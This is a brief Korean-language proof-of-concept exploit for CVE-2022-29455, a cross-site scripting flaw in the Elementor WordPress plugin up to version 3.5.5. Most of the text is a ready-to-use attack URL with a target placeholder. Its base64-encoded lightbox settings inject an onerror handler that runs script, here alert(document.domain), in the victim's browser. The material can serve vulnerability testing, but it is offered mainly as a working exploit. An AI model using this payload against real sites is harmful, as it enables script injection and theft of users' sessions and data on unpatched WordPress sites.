
CVE-2022-29455에 대한 개념 증명 익스플로잇으로, Elementor WordPress 플러그인(<=3.5.5)의 조작된 라이트박스 액션 URL을 통한 교차 사이트 스크립팅 취약점입니다.
워드프레스 취약점 - XSS ( 크로스 사이트 스크립팅 )
https://add your target here/wp-content/plugins/elementor/assets/js/frontend.min.js
https://add your target here/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=